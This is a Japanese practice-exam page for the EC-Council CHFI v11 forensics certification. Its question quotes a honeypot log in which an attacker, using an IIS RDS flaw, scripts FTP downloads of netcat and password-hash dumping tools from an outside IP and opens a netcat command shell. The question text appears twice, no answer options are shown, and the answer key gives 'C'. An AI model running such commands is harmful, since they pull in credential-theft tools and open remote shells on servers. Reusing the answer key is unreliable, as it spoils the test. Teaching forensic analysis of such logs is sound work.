312-49v11日本語 無料問題集「EC-COUNCIL Computer Hacking Forensic Investigator (CHFI-v11) (312-49v11日本語版)」
次の抜粋は、lab.wiretrip.net でホストされていたハニーポット ログから取られたものです。Snort は、213.116.251.162 からの Unicode 攻撃を報告しました。ファイル パーミッション正規化の脆弱性 (UNICODE 攻撃) により、通常はスクリプトを実行する権限のない任意のフォルダーでスクリプトを実行できるようになります。攻撃者は Unicode 攻撃を試み、最終的に boot.ini を表示することに成功しました。
次に、msadcs.dll を介して RDS の操作に切り替えます。RDS の脆弱性により、悪意のあるユーザーは IIS サーバー上でシェル コマンド (CMD.EXE など) を実行する SQL ステートメントを作成できます。ディレクトリが存在することを確認するために簡単なクエリを実行し、msadcs.dll へのクエリで正常に機能していることを確認します。攻撃者は RDS クエリを実行し、その結果、以下に示すようにコマンドが実行されます。
「cmd1.exe /c open 213.116.251.162 >ftpcom」
「cmd1.exe /c echo johna2k >>ftpcom」
「cmd1.exe /c echo haxedj00 >>ftpcom」
「cmd1.exe /c echo get nc.exe >>ftpcom」
「cmd1.exe /c echo get pdump.exe >>ftpcom」
「cmd1.exe /c echo get samdump.dll >>ftpcom」
「cmd1.exe /c echo quit >>ftpcom」
「cmd1.exe /c ftp -s:ftpcom」
「cmd1.exe /c nc -l -p 6969 -e cmd1.exe」
与えられたエクスプロイトから何を推測できますか?
次に、msadcs.dll を介して RDS の操作に切り替えます。RDS の脆弱性により、悪意のあるユーザーは IIS サーバー上でシェル コマンド (CMD.EXE など) を実行する SQL ステートメントを作成できます。ディレクトリが存在することを確認するために簡単なクエリを実行し、msadcs.dll へのクエリで正常に機能していることを確認します。攻撃者は RDS クエリを実行し、その結果、以下に示すようにコマンドが実行されます。
「cmd1.exe /c open 213.116.251.162 >ftpcom」
「cmd1.exe /c echo johna2k >>ftpcom」
「cmd1.exe /c echo haxedj00 >>ftpcom」
「cmd1.exe /c echo get nc.exe >>ftpcom」
「cmd1.exe /c echo get pdump.exe >>ftpcom」
「cmd1.exe /c echo get samdump.dll >>ftpcom」
「cmd1.exe /c echo quit >>ftpcom」
「cmd1.exe /c ftp -s:ftpcom」
「cmd1.exe /c nc -l -p 6969 -e cmd1.exe」
与えられたエクスプロイトから何を推測できますか?
正解:C
解答を投票する
解説: (JPNTest メンバーにのみ表示されます)